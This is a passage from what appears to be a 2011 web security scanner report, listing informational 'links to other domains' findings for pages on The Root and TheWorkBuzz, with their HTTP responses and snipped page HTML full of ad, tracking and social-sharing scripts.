<li><a href="http://my.msn.com/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://investing.money.msn.com/investments/stock-price">Quotes</a></li><li><a href="http://wonderwall.msn.com/">Wonderwall</a></li><li><a href="http://games.msn.com/"><strong>
...[SNIP]...
<li><a href="http://realestate.msn.com/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.msn.com/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.msn.com">Horoscopes</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AI">Bing</a>
...[SNIP]...
<li class="first"><a href="http://hotmail.msn.com">Hotmail</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li>
<a href="http://feeds.feedburner.com/TheRootRssFeed">rss</a>
...[SNIP]...
<div class="options-row1"><a class="share-link" href="http://www.facebook.com/share.php" onclick="return fbs_click('http://www.theroot.com/views/2011/young-futurists','The Root\'s Young Futurists List of 25 Innovators')"target="_blank"><span class="share-link-wrapper">
...[SNIP]...
</a><a target="_blank" class="share-link" href="http://www.digg.com/submit?url=http://www.theroot.com/views/2011/young-futurists&title=The+Root%5C%27s+Young+Futurists+List+of+25+Innovators&media=news&topic=arts_culturetarget="_blank" onclick=""><span class="share-link-wrapper">
...[SNIP]...
</a><a class="share-link" href="http://www.twitter.com/home?status=Check+this+out:+The+Root%27s+Young+Futurists+List+of+25+Innovators+http://wapo.st/f9HHCs" target="_blank"><span class="share-link-wrapper">
...[SNIP]...
</a><script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text">http://www.theroot.com/views/2011/young-futurists</script><a class="share-link" target="_blank" href="http://www.myspace.com/index.cfm?fuseaction=postto&t=The Root\'s Young Futurists List of 25 Innovators&u=http://www.theroot.com/views/2011/young-futurists"><span class="share-link-wrapper">
...[SNIP]...
<div class="options-row2"><a class="share-link" target="_blank" href="http://www.stumbleupon.com/submit?url=http://www.theroot.com/views/2011/young-futurists&title=The Root\'s Young Futurists List of 25 Innovators"><span class="share-link-wrapper">
...[SNIP]...
</a><a class="share-link" target="_blank" title="Google" href="http://www.google.com/bookmarks/mark?op=edit&bkmk=http://www.theroot.com/views/2011/young-futurists&title=The Root\'s Young Futurists List of 25 Innovators" rel="nofollow"><span class="share-link-wrapper">
...[SNIP]...
<div style="padding-left:5px;"><iframe src="http://www.facebook.com/plugins/like.php?api_key=2af8520b23bac95db13de0c7e5748525&href=http://www.theroot.com/views/2011/young-futurists&layout=standard&show_faces=false&width=400&action=like&font=verdana&colorscheme=light&height=50" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:400px; height:50px;" allowTransparency="true"></iframe>
...[SNIP]...
</fb:like>-->
       <a target="_blank" class="share-link" href="http://www.digg.com/submit?url=http://www.theroot.com/views/2011/young-futurists&title=The+Root%5C%27s+Young+Futurists+List+of+25+Innovators&media=news&topic=arts_culturetarget="_blank" onclick=""><span class="share-link-wrapper">
...[SNIP]...
</a> <a class="share-link" href="http://www.twitter.com/home?status=Check+this+out:+The+Root%27s+Young+Futurists+List+of+25+Innovators+http://wapo.st/f9HHCs" target="_blank"><span class="share-link-wrapper">
...[SNIP]...
</a>    <script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text">http://www.theroot.com/views/2011/young-futurists</script> <a class="share-link" target="_blank" href="http://www.myspace.com/index.cfm?fuseaction=postto&t=The Root\'s Young Futurists List of 25 Innovators&u=http://www.theroot.com/views/2011/young-futurists"><span class="share-link-wrapper">
...[SNIP]...
</a> <a class="share-link" target="_blank" href="http://www.stumbleupon.com/submit?url=http://www.theroot.com/views/2011/young-futurists&title=The Root\'s Young Futurists List of 25 Innovators"><span class="share-link-wrapper">
...[SNIP]...
</a> <a class="share-link" target="_blank" title="Google" href="http://www.google.com/bookmarks/mark?op=edit&bkmk=http://www.theroot.com/root-100/2010/janelle-mon-e&title=The Root\'s Young Futurists List of 25 Innovators" rel="nofollow"><span class="share-link-wrapper">
...[SNIP]...
<div style="padding-left:5px;">
   <iframe src="http://www.facebook.com/plugins/like.php?api_key=2af8520b23bac95db13de0c7e5748525&href=http://www.theroot.com/views/2011/young-futurists&layout=standard&show_faces=false&width=450&action=like&font=verdana&colorscheme=light&height=50" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:50px;" allowTransparency="true"></iframe>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<div class="content">
<script src="http://downloads.mailchimp.com/js/jquery.validate.js" type="text/javascript"></script>
<script src="http://downloads.mailchimp.com/js/jquery.form.js" type="text/javascript"></script>
...[SNIP]...
<div class="theroot_mc_signup_link"><a href="http://www.twitter.com/theroot247" target="_blank" title="Follow us on Twitter"><img alt="Twitter" src="/sites/all/modules/theroot_mailchimp/images/twitter.png">
...[SNIP]...
<div class="theroot_mc_signup_link"><a href="http://www.facebook.com/theroot" target="_blank" title="Like us on Facebook"><img alt="Facebook" src="/sites/all/modules/theroot_mailchimp/images/facebook.png"</a>
...[SNIP]...
<div class="theroot_mc_signup_link"><a href="http://feeds.feedburner.com/TheRootRssFeed" target="_blank" title="Subscribe to our Feed"><img alt="Feed" src="/sites/all/modules/theroot_mailchimp/images/feed.png">
...[SNIP]...
<div style="width: 308px; border-bottom: 1px solid rgb(103, 113, 42); margin-left: 6px;">
   <iframe scrolling="no"
                   frameborder="0" allowtransparency="true" style="border: medium none; overflow: hidden; width: 240px; height: 60px; margin-left: 52px;"
                   src="http://www.facebook.com/plugins/likebox.php?id=26423400230&width=240&connections=0&stream=false&header=false&height=60">
   </iframe>
</div>
<div style="width: 336px; height: 183px; overflow-x: hidden; overflow-y: scroll;">
   <iframe scrolling="no"
                   frameborder="0"
                   allowtransparency="true"
                   style="border: medium none; overflow: hidden; width: 306px; height: 600px; margin-left: 14px;"
                   src="http://www.facebook.com/plugins/activity.php?site=www.theroot.com&width=306&height=600&header=false&border_color=white&font=arial&colorscheme=light&recommendations=true">
   </iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://media3.washingtonpost.com/wp-srv/wapolabs/revplat/prod/1_4_1/js/
rev_platform_ads.min.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</a> :: <a class="rss" href="http://feeds.feedburner.com/TheRootRssFeed">rss feed</a>
...[SNIP]...
</span>
   <a href="http://www.washingtonpost.com/wp-adv/mediacenter/html/ad_theroot.html" target="_blank">Advertising</a>
...[SNIP]...
<div id="footerRow3">
   <a href="http://www.washingtonpost.com/wp-adv/mediacenter/html/about_welcome.html">© 1996-2011 The Washington Post Company</a>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
       <noscript>
       <img src="http://pixel.quantserve.com/pixel/p-5cYn7dCzvaeyA.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
       </noscript>
...[SNIP]...
</script>
<script src="http://js-kit.com/comments-count.js"></script>

<script type="text/javascript" src="http://bunsen.wapolabs.com/identity/1.2.1/js/wapo_site_bottom.js"></script>
...[SNIP]...

17.389. http://www.theroot.com/views/meet-25-people-who-will-change-our-world previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/views/meet-25-people-who-will-change-our-world

Issue detail

The page was loaded from a URL containing a query string:

http://www.theroot.com/views/meet-25-people-who-will-change-our-world?gt1=38002

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jqueryui/1.6/jquery-ui.min.js
http://bunsen.wapolabs.com/identity/1.2.1/js/wapo_site_bottom.js
http://bunsen.wapolabs.com/identity/theroot/prod/1.2.1/js/wapo_identity.js
http://d.yimg.com/ds/badge2.js
http://downloads.mailchimp.com/js/jquery.form.js
http://downloads.mailchimp.com/js/jquery.validate.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/TheRootRssFeed
http://js-kit.com/comments-count.js
http://js.adsonar.com/js/adsonar.js
http://media.washingtonpost.com/wp-adv/dm/nw/dm_client.js
http://media.washingtonpost.com/wp-srv/ad/root_ad.js
http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js
http://media3.washingtonpost.com/wp-srv/wapolabs/revplat/prod/1_4_1/js/
http://pixel.quantserve.com/pixel/p-5cYn7dCzvaeyA.gif
http://www.digg.com/submit?url=http://www.theroot.com/views/meet-25-people-who-will-change-our-world&title=Meet+25+People+Who+Will+Change+Our+World&media=news&topic=arts_culturetarget=
http://www.facebook.com/plugins/activity.php?site=www.theroot.com&width=306&height=600&header=false&border_color=white&font=arial&colorscheme=light&recommendations=true
http://www.facebook.com/plugins/like.php?api_key=2af8520b23bac95db13de0c7e5748525&href=http://www.theroot.com/views/meet-25-people-who-will-change-our-world&layout=standard&show_faces=false&width=400&action=like&font=verdana&colorscheme=light&height=50
http://www.facebook.com/plugins/like.php?api_key=2af8520b23bac95db13de0c7e5748525&href=http://www.theroot.com/views/meet-25-people-who-will-change-our-world&layout=standard&show_faces=false&width=450&action=like&font=verdana&colorscheme=light&height=50
http://www.facebook.com/plugins/likebox.php?id=26423400230&width=240&connections=0&stream=false&header=false&height=60
http://www.facebook.com/share.php
http://www.facebook.com/theroot
http://www.google.com/bookmarks/mark?op=edit&bkmk=http://www.theroot.com/root-100/2010/janelle-mon-e&title=Meet 25 People Who Will Change Our World
http://www.google.com/bookmarks/mark?op=edit&bkmk=http://www.theroot.com/views/meet-25-people-who-will-change-our-world&title=Meet 25 People Who Will Change Our World
http://www.myspace.com/index.cfm?fuseaction=postto&t=Meet 25 People Who Will Change Our World&u=http://www.theroot.com/views/meet-25-people-who-will-change-our-world
http://www.stumbleupon.com/submit?url=http://www.theroot.com/views/meet-25-people-who-will-change-our-world&title=Meet 25 People Who Will Change Our World
http://www.twitter.com/home?status=Check+this+out:+Meet+25+People+Who+Will+Change+Our+World+http://wapo.st/gotTA7
http://www.twitter.com/theroot247
http://www.washingtonpost.com/wp-adv/mediacenter/html/about_welcome.html
http://www.washingtonpost.com/wp-adv/mediacenter/html/ad_theroot.html

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:17:24 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:17:26 GMT
Date: Wed, 02 Feb 2011 16:17:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.6/jquery-ui.min.js"></script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js"></script>
<script language="javascript" type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/root_ad.js"></script>
<script language="javascript" type="text/javascript" src="http://media.washingtonpost.com/wp-adv/dm/nw/dm_client.js"></script>
<script type="text/javascript" src="http://bunsen.wapolabs.com/identity/theroot/prod/1.2.1/js/wapo_identity.js"></script>
...[SNIP]...
<li>
<a href="http://feeds.feedburner.com/TheRootRssFeed">rss</a>
...[SNIP]...
<div class="options-row1"><a class="share-link" href="http://www.facebook.com/share.php" onclick="return fbs_click('http://www.theroot.com/views/meet-25-people-who-will-change-our-world','Meet 25 People Who Will Change Our World')"target="_blank"><span class="share-link-wrapper">
...[SNIP]...
</a><a target="_blank" class="share-link" href="http://www.digg.com/submit?url=http://www.theroot.com/views/meet-25-people-who-will-change-our-world&title=Meet+25+People+Who+Will+Change+Our+World&media=news&topic=arts_culturetarget="_blank" onclick=""><span class="share-link-wrapper">
...[SNIP]...
</a><a class="share-link" href="http://www.twitter.com/home?status=Check+this+out:+Meet+25+People+Who+Will+Change+Our+World+http://wapo.st/gotTA7" target="_blank"><span class="share-link-wrapper">
...[SNIP]...
</a><script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text">http://www.theroot.com/views/meet-25-people-who-will-change-our-world</script><a class="share-link" target="_blank" href="http://www.myspace.com/index.cfm?fuseaction=postto&t=Meet 25 People Who Will Change Our World&u=http://www.theroot.com/views/meet-25-people-who-will-change-our-world"><span class="share-link-wrapper">
...[SNIP]...
<div class="options-row2"><a class="share-link" target="_blank" href="http://www.stumbleupon.com/submit?url=http://www.theroot.com/views/meet-25-people-who-will-change-our-world&title=Meet 25 People Who Will Change Our World"><span class="share-link-wrapper">
...[SNIP]...
</a><a class="share-link" target="_blank" title="Google" href="http://www.google.com/bookmarks/mark?op=edit&bkmk=http://www.theroot.com/views/meet-25-people-who-will-change-our-world&title=Meet 25 People Who Will Change Our World" rel="nofollow"><span class="share-link-wrapper">
...[SNIP]...
<div style="padding-left:5px;"><iframe src="http://www.facebook.com/plugins/like.php?api_key=2af8520b23bac95db13de0c7e5748525&href=http://www.theroot.com/views/meet-25-people-who-will-change-our-world&layout=standard&show_faces=false&width=400&action=like&font=verdana&colorscheme=light&height=50" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:400px; height:50px;" allowTransparency="true"></iframe>
...[SNIP]...
</fb:like>-->
       <a target="_blank" class="share-link" href="http://www.digg.com/submit?url=http://www.theroot.com/views/meet-25-people-who-will-change-our-world&title=Meet+25+People+Who+Will+Change+Our+World&media=news&topic=arts_culturetarget="_blank" onclick=""><span class="share-link-wrapper">
...[SNIP]...
</a> <a class="share-link" href="http://www.twitter.com/home?status=Check+this+out:+Meet+25+People+Who+Will+Change+Our+World+http://wapo.st/gotTA7" target="_blank"><span class="share-link-wrapper">
...[SNIP]...
</a>    <script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text">http://www.theroot.com/views/meet-25-people-who-will-change-our-world</script> <a class="share-link" target="_blank" href="http://www.myspace.com/index.cfm?fuseaction=postto&t=Meet 25 People Who Will Change Our World&u=http://www.theroot.com/views/meet-25-people-who-will-change-our-world"><span class="share-link-wrapper">
...[SNIP]...
</a> <a class="share-link" target="_blank" href="http://www.stumbleupon.com/submit?url=http://www.theroot.com/views/meet-25-people-who-will-change-our-world&title=Meet 25 People Who Will Change Our World"><span class="share-link-wrapper">
...[SNIP]...
</a> <a class="share-link" target="_blank" title="Google" href="http://www.google.com/bookmarks/mark?op=edit&bkmk=http://www.theroot.com/root-100/2010/janelle-mon-e&title=Meet 25 People Who Will Change Our World" rel="nofollow"><span class="share-link-wrapper">
...[SNIP]...
<div style="padding-left:5px;">
   <iframe src="http://www.facebook.com/plugins/like.php?api_key=2af8520b23bac95db13de0c7e5748525&href=http://www.theroot.com/views/meet-25-people-who-will-change-our-world&layout=standard&show_faces=false&width=450&action=like&font=verdana&colorscheme=light&height=50" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:50px;" allowTransparency="true"></iframe>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<div class="content">
<script src="http://downloads.mailchimp.com/js/jquery.validate.js" type="text/javascript"></script>
<script src="http://downloads.mailchimp.com/js/jquery.form.js" type="text/javascript"></script>
...[SNIP]...
<div class="theroot_mc_signup_link"><a href="http://www.twitter.com/theroot247" target="_blank" title="Follow us on Twitter"><img alt="Twitter" src="/sites/all/modules/theroot_mailchimp/images/twitter.png">
...[SNIP]...
<div class="theroot_mc_signup_link"><a href="http://www.facebook.com/theroot" target="_blank" title="Like us on Facebook"><img alt="Facebook" src="/sites/all/modules/theroot_mailchimp/images/facebook.png"</a>
...[SNIP]...
<div class="theroot_mc_signup_link"><a href="http://feeds.feedburner.com/TheRootRssFeed" target="_blank" title="Subscribe to our Feed"><img alt="Feed" src="/sites/all/modules/theroot_mailchimp/images/feed.png">
...[SNIP]...
<div style="width: 308px; border-bottom: 1px solid rgb(103, 113, 42); margin-left: 6px;">
   <iframe scrolling="no"
                   frameborder="0" allowtransparency="true" style="border: medium none; overflow: hidden; width: 240px; height: 60px; margin-left: 52px;"
                   src="http://www.facebook.com/plugins/likebox.php?id=26423400230&width=240&connections=0&stream=false&header=false&height=60">
   </iframe>
</div>
<div style="width: 336px; height: 183px; overflow-x: hidden; overflow-y: scroll;">
   <iframe scrolling="no"
                   frameborder="0"
                   allowtransparency="true"
                   style="border: medium none; overflow: hidden; width: 306px; height: 600px; margin-left: 14px;"
                   src="http://www.facebook.com/plugins/activity.php?site=www.theroot.com&width=306&height=600&header=false&border_color=white&font=arial&colorscheme=light&recommendations=true">
   </iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://media3.washingtonpost.com/wp-srv/wapolabs/revplat/prod/1_4_1/js/
rev_platform_ads.min.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</a> :: <a class="rss" href="http://feeds.feedburner.com/TheRootRssFeed">rss feed</a>
...[SNIP]...
</span>
   <a href="http://www.washingtonpost.com/wp-adv/mediacenter/html/ad_theroot.html" target="_blank">Advertising</a>
...[SNIP]...
<div id="footerRow3">
   <a href="http://www.washingtonpost.com/wp-adv/mediacenter/html/about_welcome.html">© 1996-2011 The Washington Post Company</a>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
       <noscript>
       <img src="http://pixel.quantserve.com/pixel/p-5cYn7dCzvaeyA.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
       </noscript>
...[SNIP]...
</script>
<script src="http://js-kit.com/comments-count.js"></script>

<script type="text/javascript" src="http://bunsen.wapolabs.com/identity/1.2.1/js/wapo_site_bottom.js"></script>
...[SNIP]...

17.390. http://www.theworkbuzz.com/career-advice/women-cautious-about-social-media-and-work/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theworkbuzz.com
Path:	/career-advice/women-cautious-about-social-media-and-work/

Issue detail

The page was loaded from a URL containing a query string:

http://www.theworkbuzz.com/career-advice/women-cautious-about-social-media-and-work/?cobrand=msn&utm_source=MSN&utm_medium=MSNHP&utm_campaign=MSNCareers&gt1=23000

The response contains the following links to other domains:

http://ads1.msn.com/library/dap.js?ver=3.0.4
http://advertising.msn.com/home/home.asp
http://alexandralevit.typepad.com/
http://alltop.com/
http://askamanager.blogspot.com/
http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS
http://autos.msn.com/default.aspx
http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1
http://badges.alltop.com/images/alltop_170x30_we2.jpg
http://blog.generationrelations.com/
http://blog.penelopetrunk.com/
http://blogs.abcnews.com/womenomics/
http://blogs.msdn.com/heatherleigh/default.aspx
http://blogs.wsj.com/laidoff/?mod=blogmod
http://blstc.msn.com/br/gbl/lg/1/l/msft.gif
http://blstj.msn.com/br/gbl/js/2/report.js?ver=3.0.4
http://blstj.msn.com/br/gbl/js/4/navigation.js?ver=3.0.4
http://careerealism.wordpress.com/
http://careers.msn.com/
http://careers.msn.com/help.aspx
http://cityguides.msn.com/
http://evilhrlady.blogspot.com/
http://g.msn.com/0AD00036/931292.1??HCType=1&CID=931292&PG=SHPHDR
http://g.msn.com/0TO_/enus
http://g.msn.com/2privacy/enus
http://games.msn.com/
http://health.msn.com/
http://hotmail.msn.com/
http://hrminion.blogspot.com/
http://hrwench.blogspot.com/
http://http/www.careerbuilder.com/Article/CB-1831-Workplace-Issues-9-Ways-to-Get-Fired-by-Social-Media/
http://ie8.msn.com/microsoft/internet-explorer-8/en-us/ie8.aspx?ocid=B037MSN55C0403A
http://im.live.com/messenger/im/home/?source=MSNTDLINK
http://img.icbdr.com/images/pixel.gif
http://img.icbdr.com/images/plink/logos/powered_by_cb_logo.gif
http://keppiecareers.wordpress.com/
http://latino.msn.com/empleos/
http://lifestyle.msn.com/default.aspx
http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1241134192&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fcareers.msn.com%2F&lc=1033&id=74314
http://mail.live.com/
http://manpowerblogs.com/holmes/
http://maps.live.com/default.aspx?wip=2&v=2&rtp=~&FORM=MSNH
http://moneycentral.msn.com/
http://moneycentral.msn.com/home.asp
http://movies.msn.com/
http://msn.careerbuilder.com/Article/MSN-1953-Workplace-Issues-Social-Media-Pitfalls/
http://msn.careerbuilder.com/Article/MSN-2349-Workplace-Issues-12-Ways-to-Get-Fired-for-Facebook/
http://msn.careerbuilder.com/Article/MSN-2440-Workplace-Issues-Blogger-beware-A-few-things-you-should-know-before-blogging-about-work/
http://msn.delish.com/
http://msn.foxsports.com/
http://msn.match.com/index.aspx?TrackingID=516163&BannerID=543351
http://msn.whitepages.com/
http://music.msn.com/
http://my.msn.com/
http://personalbrandingblog.wordpress.com/
http://platform.linkedin.com/in.js
http://platform.twitter.com/widgets.js
http://punkrockhr.com/
http://realestate.msn.com/
http://rss.msn.com/
http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-803759h&cg=0&cc=1&ts=noscript
http://sethgodin.typepad.com/
http://shiftingcareers.blogs.nytimes.com/
http://specials.msn.com/alphabet.aspx
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://tech.msn.com/
http://thehiringsite.careerbuilder.com/2010/11/12/facebook-can-get-you-fired-but-also-sued-and-more-news-from-this-week/
http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif
http://tv.msn.com/
http://twitter.com/CareerBuilder
http://twitter.com/share?url=http://www.theworkbuzz.com/career-advice/women-cautious-about-social-media-and-work/&via=careerbuilder&count=horizontal
http://w.sharethis.com/widget/?wp=2.6.1&publisher=16298438-73ee-4f37-8234-2c6423690e18
http://weather.msn.com/
http://workinretail.com/
http://www.bing.com/travel?cid=msn_careers
http://www.blackcareers.com/
http://www.blogher.com/topic/business-career-personal-finance
http://www.brazencareerist.com/
http://www.careerbuilder.com/?SiteId=workbuzz004
http://www.careerbuilder.com/?lr=workbuzz&siteid=rkbuzzlg
http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx?lr=workbuzz&siteid=workbuzz003
http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx?lr=workbuzz&siteid=workbuzz003
http://www.careerhubblog.com/
http://www.careerpath.com/
http://www.careerrookie.com/
http://www.cbinstitute.com/
http://www.cbresume.com/
http://www.cbsalary.com/
http://www.decode.net/wp-content/uploads/DecodeSocialMediaatWorkReport.pdf
http://www.degreedriven.com/
http://www.empleoscb.com/
http://www.employmentblawg.com/
http://www.employmentspot.com/
http://www.facebook.com/careerbuilder
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.theworkbuzz.com%2Fcareer-advice%2Fwomen-cautious-about-social-media-and-work%2F&layout=button_count&show_faces=false&width=130&action=recommend&font=arial&colorscheme=light&height=20
http://www.fastcompany.com/blogs
http://www.fistfuloftalent.com/
http://www.huffingtonpost.com/business/
http://www.humancapitalist.com/
http://www.jibberjobber.com/login.php
http://www.jobs.net/
http://www.jobsearchmarketing.com/
http://www.jtodonnell.com/wordpress/
http://www.leapwalking.com/
http://www.momsrising.org/momsblogging/
http://www.msn.com/
http://www.msnbc.msn.com/
http://www.personified.com/
http://www.primecb.com/
http://www.spherioncareerblog.com/
http://www.thefutureofwork.net/blog/
http://www.thehiringsite.com/
http://www.truecareers.com/
http://www.usnews.com/blogs/outside-voices-careers/index.html
http://www.wildfireapp.com/website/302/companies/130300/widget_loader.js
http://www.wonderwall.com/
http://yellowpages.msn.com/
https://feedback.msn.com/default.aspx?productkey=careers&mkt=en-us

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:17:33 GMT
X-Pingback: http://www.theworkbuzz.com/xmlrpc.php
Link: <http://www.theworkbuzz.com/?p=6662>; rel=shortlink
Connection: close
Set-Cookie: WP-Cobrand=msn; expires=Wed, 02-Feb-2011 18:40:54 GMT
Set-Cookie: X-Mapping-caklakng=AB5BE8F3F900462BB56765F394471F1C; path=/
Content-Length: 44340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/
...[SNIP]...
</script>
<script type='text/javascript' src='http://blstj.msn.com/br/gbl/js/2/report.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://blstj.msn.com/br/gbl/js/4/navigation.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://ads1.msn.com/library/dap.js?ver=3.0.4'></script>
...[SNIP]...
<li class="MSNfirst"><a href="http://www.msn.com">MSN home</a></li><li><a href="http://hotmail.msn.com">Mail</a></li><li><a href="http://my.msn.com">My MSN</a></li><li class="MSNlast"><a href="http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1241134192&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fcareers.msn.com%2F&lc=1033&id=74314"
class="MSNdMSNME_1">Sign in</a>
...[SNIP]...
<li class="MSNfirst MSNselected"><a href="http://health.msn.com">health</a></li><li><a
href="http://moneycentral.msn.com">money</a></li><li><a href="http://www.bing.com/travel?cid=msn_careers">
travel</a>
...[SNIP]...
<li><a href="http://tech.msn.com/">tech</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://mail.live.com"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="Hotmail" /><span>
...[SNIP]...
<li><a href="http://im.live.com/messenger/im/home/?source=MSNTDLINK" id="MSNmsg"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="Messenger" /><span>
...[SNIP]...
<li><a href="http://my.msn.com"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="My MSN" /><span>
...[SNIP]...
<li class="MSNlast"><a href="http://ie8.msn.com/microsoft/internet-explorer-8/en-us/ie8.aspx?ocid=B037MSN55C0403A"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="Internet Explorer 8" /><span>
...[SNIP]...
<li class="MSNfirst"><a href="http://www.bing.com/travel?cid=msn_careers">Airfares & Travel</a>
...[SNIP]...
<li><a href="http://autos.msn.com/default.aspx">Autos</a></li><li><a href="http://careers.msn.com">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://cityguides.msn.com">City Guides</a>
...[SNIP]...
<li class="MSNlast"><a href="http://msn.match.com/index.aspx?TrackingID=516163&BannerID=543351 ">Dating & Personals</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://msn.delish.com/">Food & Entertaining</a>
...[SNIP]...
<li><a href="http://games.msn.com">Games</a></li><li><a href="http://health.msn.com">Health & Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS">Horoscopes</a></li><li class="MSNlast"><a href="http://lifestyle.msn.com/default.aspx">Lifestyle</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://maps.live.com/default.aspx?wip=2&v=2&rtp=~&FORM=MSNH">Maps & Directions</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/home.asp">Money</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com">Music</a></li><li class="MSNlast"><a href="http://www.msnbc.msn.com/">News</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://realestate.msn.com">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://g.msn.com/0AD00036/931292.1??HCType=1&CID=931292&PG=SHPHDR">Shopping</a></li><li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://tech.msn.com">Tech & Gadgets</a>
...[SNIP]...
<li class="MSNlast"><a href="http://tv.msn.com">TV</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://weather.msn.com">Weather</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.wonderwall.com/">Wonderwall</a></li><li><a href="http://yellowpages.msn.com">Yellow Pages</a>
...[SNIP]...
<li class="MSNlast"><a href="http://specials.msn.com/alphabet.aspx">MSN Directory</a>
...[SNIP]...
<div id="MSNlogo">
<a href="http://www.msn.com">
<img src="http://blstc.msn.com/br/gbl/lg/1/l/msft.gif" alt="go to MSN.com"
width="118" height="35" /></a><a class="MSNname" href="http://careers.msn.com">careers</a>
...[SNIP]...
<span><a href="http://latino.msn.com/empleos/">Español</a>
...[SNIP]...
